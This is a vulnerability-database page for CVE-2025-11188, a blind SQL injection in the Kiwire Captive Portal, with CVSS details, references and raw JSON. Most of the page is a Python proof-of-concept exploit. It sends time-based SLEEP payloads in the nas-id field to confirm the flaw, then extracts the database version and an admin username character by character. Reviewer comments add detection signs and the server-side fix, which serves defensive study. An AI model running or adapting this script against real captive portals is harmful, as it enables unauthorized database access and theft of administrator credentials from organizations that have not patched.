Security Vulnerability Report
CVE-2025-11188 CVSS 7.3 HIGH

CVE-2025-11188

Published: 2025-10-10 11:15:40
Last Modified: 2025-11-14 23:46:45

Description

The Kiwire Captive Portal contains a blind SQL injection in the nas-id parameter, allowing for SQL commands to be issued and to compromise the corresponding database.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:synchroweb:kiwire:3.6:*:*:*:*:*:*:* - VULNERABLE
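Kiwire Captive Portal: all unpatched versions (the CPE entry above names only version 3.6; check the vendor advisory for the fixed release)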

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11188 - Kiwire Captive Portal Blind SQL Injection PoC
# Vulnerability: Blind SQL Injection in nas-id parameter
# Author: Security Researcher
#
# NOTE(review): this listing was collapsed onto one line on the page; the
# indentation below is reconstructed. The endpoint path, the extra
# username/password form fields and the `admin` table / `username` column are
# the PoC author's assumptions; the advisory text on this page confirms only
# that the `nas-id` parameter is injectable (CWE-89).
#
# Defender's reading of the traffic this script generates:
#   * POST bodies whose `nas-id` value carries SQL syntax (a quote, `OR`,
#     `IF(`, `SLEEP(`, `SUBSTRING(`, `@@version`, a trailing `-- -`);
#   * long runs of near-identical POSTs from one client, up to 95 per
#     extracted character, to the portal login endpoint;
#   * responses that stall for roughly 2 or 5 seconds when a guess matches.
# The durable fix is on the server side: bind `nas-id` as a query parameter
# instead of concatenating it into SQL, and apply the vendor's fixed release.
import requests
import time

# Placeholder host; nothing on the page ties it to a real deployment.
TARGET_URL = "http://target-kiwire-portal.com"
NAS_ID_ENDPOINT = "/cgi-bin/login.cgi"  # Adjust based on actual endpoint


def check_vulnerability(target_url):
    """Check if the target is vulnerable to blind SQL injection.

    Sends one ordinary login POST, then one whose ``nas-id`` value asks the
    database to sleep for 5 seconds, and reports the target as vulnerable
    when the second request takes longer than 4 seconds.

    Args:
        target_url: Base URL of the portal; ``NAS_ID_ENDPOINT`` is appended.

    Returns:
        True if the injected request took more than 4 seconds, else False.
    """
    # Normal request
    normal_payload = "valid-nas-id"
    normal_response = requests.post(
        f"{target_url}{NAS_ID_ENDPOINT}",
        data={"nas-id": normal_payload, "username": "test", "password": "test"}
    )
    # Baseline latency; it is only printed below, never compared.
    normal_time = normal_response.elapsed.total_seconds()

    # Time-based blind SQL injection test
    # The payload uses MySQL-style IF()/SLEEP(); the page does not state which
    # database engine the product uses (presumably MySQL/MariaDB, confirm).
    injection_payload = "' OR IF(1=1, SLEEP(5), 0) -- -"
    start_time = time.time()
    inject_response = requests.post(
        f"{target_url}{NAS_ID_ENDPOINT}",
        data={"nas-id": injection_payload, "username": "test", "password": "test"}
    )
    elapsed_time = time.time() - start_time

    # NOTE(review): the verdict rests on a fixed 4-second threshold, so a slow
    # or heavily loaded portal produces a false positive. Treat a hit as a
    # lead to confirm against the vendor advisory, not as proof.
    if elapsed_time > 4:  # If response delayed by ~5 seconds
        print(f"[+] Target is VULNERABLE to blind SQL injection!")
        print(f"[+] Normal response time: {normal_time:.2f}s")
        print(f"[+] Injection response time: {elapsed_time:.2f}s")
        return True
    else:
        print(f"[-] Target does not appear vulnerable")
        return False


def extract_database_version(target_url):
    """Extract MySQL version using time-based blind SQL injection.

    Guesses ``@@version`` one character at a time (positions 1-19, printable
    ASCII 32-126): each guess is one POST, and a response slower than 1.5
    seconds is taken to mean the guess matched.

    Args:
        target_url: Base URL of the portal; ``NAS_ID_ENDPOINT`` is appended.

    Returns:
        The characters recovered so far, as a string (possibly empty).
    """
    version = ""
    for position in range(1, 20):
        for char_code in range(32, 127):
            # Time-based extraction: SUBSTRING(version, position, 1) = char_code
            payload = f"' OR IF(ASCII(SUBSTRING(@@version,{position},1))={char_code}, SLEEP(2), 0) -- -"
            start_time = time.time()
            requests.post(
                f"{target_url}{NAS_ID_ENDPOINT}",
                data={"nas-id": payload}
            )
            elapsed = time.time() - start_time
            if elapsed > 1.5:
                version += chr(char_code)
                print(f"[+] Extracted so far: {version}")
                break
        else:
            # for-else: no candidate delayed the response at this position,
            # so the string is assumed to have ended and the scan stops.
            # NOTE(review): read as for-else from the collapsed source;
            # attaching it to the `if` would stop after the first guess.
            break
    return version


def extract_credentials(target_url, table_name="admin"):
    """Extract admin credentials from database.

    Despite the name, the visible code recovers only the first ``username``
    value of ``table_name`` (up to 49 characters); no password is read.

    Args:
        target_url: Base URL of the portal; ``NAS_ID_ENDPOINT`` is appended.
        table_name: Table to read from; interpolated into the payload as-is.

    Returns:
        A dict with the single key ``"username"``.
    """
    # Example: extract username and password from admin table
    extracted_data = {}
    # Extract first admin username
    username = ""
    for pos in range(1, 50):
        for c in range(32, 127):
            payload = f"' OR IF(ASCII(SUBSTRING((SELECT username FROM {table_name} LIMIT 1),{pos},1))={c}, SLEEP(2), 0) -- -"
            start = time.time()
            requests.post(f"{target_url}{NAS_ID_ENDPOINT}", data={"nas-id": payload})
            if time.time() - start > 1.5:
                username += chr(c)
                break
        else:
            # for-else: no candidate matched at this position, so stop.
            break
    extracted_data["username"] = username
    print(f"[+] Extracted username: {username}")
    return extracted_data


if __name__ == "__main__":
    # Runs the timing check first and continues to the two extraction steps
    # only when that check reports a delay.
    print(f"[*] Testing {TARGET_URL} for CVE-2025-11188")
    if check_vulnerability(TARGET_URL):
        version = extract_database_version(TARGET_URL)
        print(f"[+] Database version: {version}")
        creds = extract_credentials(TARGET_URL)
        print(f"[+] Extracted credentials: {creds}")

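References

- https://www.synchroweb.com/release-notes/kiwire/security (Release Notes, Vendor Advisory)
- https://www.kb.cert.org/vuls/id/887923 (Third Party Advisory)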

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11188", "sourceIdentifier": "[email protected]", "published": "2025-10-10T11:15:40.407", "lastModified": "2025-11-14T23:46:44.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Kiwire Captive Portal contains a blind SQL injection in the nas-id parameter, allowing for SQL commands to be issued and to compromise the corresponding database."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:synchroweb:kiwire:3.6:*:*:*:*:*:*:*", "matchCriteriaId": "70C4518C-CF80-4EC0-B6AE-3B3A9F78FD6D"}]}]}], "references": [{"url": "https://www.synchroweb.com/release-notes/kiwire/security", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://www.kb.cert.org/vuls/id/887923", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}]}}